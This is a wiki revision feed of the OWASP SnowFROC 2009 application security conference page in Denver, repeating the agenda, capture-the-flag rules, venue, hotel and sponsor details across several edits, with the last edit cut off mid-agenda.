[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=56168Front Range OWASP Conference 20092009-03-05T16:09:26Z<p>Eduprey: </p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E<br />
Denver, CO 80204 (303) 556-6330<br />
<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Capture the Flag (CTF)==<br />
<br />
CTF is OPEN!<br />
<br />
If you are attending FROC, join WiFi network "Auraria Campus" and browse to [http://ctf.technowarfare.com the CTF main page]. If you need help, email edupreyATowasp.org or visit the CTF lounge upstairs from the vendor area.<br />
<br />
This year FROC will be hosting a capture the flag game / contest throughout the day. The CTF consists of a LAMP web server target and a scoreboard. <br />
<br />
Your job as a player is to successfully attack the small vulnerable web applications we provide to obtain hidden codes (called "flags".) Enter a flag into the scoreboard and you're credited with the point value for that challenge.<br />
<br />
An entrant can be a team or an individual. Small prizes will be given for the top three finishing entrants, but the greatest prize, of course, is bragging rights. Winners will be announced (and prizes awarded) at the end of the conference as part of the conference wrap-up.<br />
<br />
Thanks to:<br />
<br />
*IBM for sponsoring this event and providing technical support.<br />
*Dan Guido and the rest of the team of students from Polytechnic University for developing the code the contest is based on. (this CTF is a modified version of the one they presented at OWASP NYC 2008)<br />
<br />
===CTF Rules===<br />
<br />
1. Don't attack other players. The contest is about finding and exploiting vulnerabilities in the applications provided. (yes, attacking application users is a real-world threat -- victims will be provided in the challenges where attacking a user is required.)<br />
<br />
2. Don't attack the infrastructure. Networks, routers, and the scoreboard are all off-limits as targets of attack.<br />
<br />
Anyone discovered breaking these rules will earn banning, forfeiture of all points, and very bad karma.<br />
<br />
==Logistics==<br />
<br />
Venue: [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E<br />
Denver, CO 80204 (303) 556-6330<br />
<br />
==Accommodations==<br />
<br />
OWASP has negotiated discounted rates with the Hotel Teatro. Rooms under the SnowFROC rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC. The discounted rate will be available until Monday, March 2.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Map].<br />
<br />
<br />
*By taxi: taxi from the airport to venue is about $50 USD<br />
<br />
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free<br />
<br />
*By car: there is plenty of parking at the Tivoli. Parking validation will be provided for registered SnowFROC participants.<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=56136Front Range OWASP Conference 20092009-03-04T23:24:14Z<p>Eduprey: </p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E<br />
Denver, CO 80204 (303) 556-6330<br />
<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Capture the Flag (CTF)==<br />
<br />
This year FROC will be hosting a capture the flag game / contest throughout the day. The CTF consists of a LAMP web server target and a scoreboard. <br />
<br />
Your job as a player is to successfully attack the small vulnerable web applications we provide to obtain hidden codes (called "flags".) Enter a flag into the scoreboard and you're credited with the point value for that challenge.<br />
<br />
An entrant can be a team or an individual. Small prizes will be given for the top three finishing entrants, but the greatest prize, of course, is bragging rights. Winners will be announced (and prizes awarded) at the end of the conference as part of the conference wrap-up.<br />
<br />
Thanks to:<br />
<br />
*IBM for sponsoring this event and providing technical support.<br />
*Dan Guido and the rest of the team of students from Polytechnic University for developing the code the contest is based on. (this CTF is a modified version of the one they presented at OWASP NYC 2008)<br />
<br />
===CTF Rules===<br />
<br />
1. Don't attack other players. The contest is about finding and exploiting vulnerabilities in the applications provided. (yes, attacking application users is a real-world threat -- victims will be provided in the challenges where attacking a user is required.)<br />
<br />
2. Don't attack the infrastructure. Networks, routers, and the scoreboard are all off-limits as targets of attack.<br />
<br />
Anyone discovered breaking these rules will earn banning, forfeiture of all points, and very bad karma.<br />
<br />
==Logistics==<br />
<br />
Venue: [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E<br />
Denver, CO 80204 (303) 556-6330<br />
<br />
==Accommodations==<br />
<br />
OWASP has negotiated discounted rates with the Hotel Teatro. Rooms under the SnowFROC rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC. The discounted rate will be available until Monday, March 2.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Map].<br />
<br />
<br />
*By taxi: taxi from the airport to venue is about $50 USD<br />
<br />
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free<br />
<br />
*By car: there is plenty of parking at the Tivoli. Parking validation will be provided for registered SnowFROC participants.<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=56111Front Range OWASP Conference 20092009-03-04T19:04:57Z<p>Eduprey: </p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E<br />
Denver, CO 80204 (303) 556-6330<br />
<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
